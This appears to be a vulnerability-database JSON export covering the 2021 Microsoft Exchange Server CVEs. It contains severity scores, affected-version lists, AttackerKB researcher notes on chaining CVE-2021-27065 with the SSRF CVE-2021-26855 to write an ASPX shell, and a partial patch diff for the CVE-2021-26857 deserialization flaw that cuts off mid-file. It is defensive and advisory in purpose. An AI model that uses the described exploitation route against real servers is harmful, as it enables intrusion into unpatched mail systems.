"cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:32:52", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-27065", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-27065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27065", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_13:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_12:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_22:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_11:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:31:43", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-26412", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-09T17:41:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26412", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26412", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:32:22", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-26855", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_13:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_12:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_22:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_11:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:32:53", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-27078", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-08T19:34:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-27078", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27078", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:32:22", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "cve", "title": "CVE-2021-26857", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2010", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-26857", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26857", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_7:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_18:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2010:sp3:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-06-01T08:23:48", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 10, 2021 7:13am UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\n**cdelafuente-r7** at March 24, 2021 3:26pm UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-27065", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "href": "https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:40:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 03, 2021 6:59pm UTC reported:\n\nAs per [Microsoft\u2019s blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server\u2019s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.\n\nI took a look at CVE-2021-26857 last night and came up with the following patch diff:\n \n \n --- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:54:18.000000000 -0600\n +++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:55:19.000000000 -0600\n @@ -1,742 +1,886 @@\n \ufeffusing System;\n +using System.Collections.Generic;\n using System.Globalization;\n using System.IO;\n +using System.Runtime.Serialization;\n +using Microsoft.Exchange.Compliance.Serialization.Formatters;\n +using Microsoft.Exchange.Data;\n +using Microsoft.Exchange.Data.Common;\n using Microsoft.Exchange.Data.Directory;\n using Microsoft.Exchange.Data.Directory.Recipient;\n using Microsoft.Exchange.Data.Directory.SystemConfiguration;\n using Microsoft.Exchange.Data.Storage;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;\n using Microsoft.Exchange.ExchangeSystem;\n using Microsoft.Exchange.TextProcessing.Boomerang;\n using Microsoft.Exchange.UM.UMCommon;\n +using Microsoft.Mapi;\n \n namespace Microsoft.Exchange.UM.UMCore\n {\n \tinternal abstract class PipelineContext : DisposableBase, IUMCreateMessage\n \t{\n \t\tinternal PipelineContext()\n \t\t{\n \t\t}\n \n \t\tinternal PipelineContext(SubmissionHelper helper)\n \t\t{\n \t\t\tbool flag = false;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tthis.helper = helper;\n \t\t\t\tthis.cultureInfo = new CultureInfo(helper.CultureInfo);\n \t\t\t\tflag = true;\n \t\t\t}\n \t\t\tfinally\n \t\t\t{\n \t\t\t\tif (!flag)\n \t\t\t\t{\n \t\t\t\t\tthis.Dispose();\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tpublic MessageItem MessageToSubmit\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageToSubmit;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic string MessageID\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageID;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageID = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal abstract Pipeline Pipeline { get; }\n \n \t\tinternal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerId;\n \t\t\t}\n \t\t}\n \n \t\tinternal Guid TenantGuid\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n \t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n 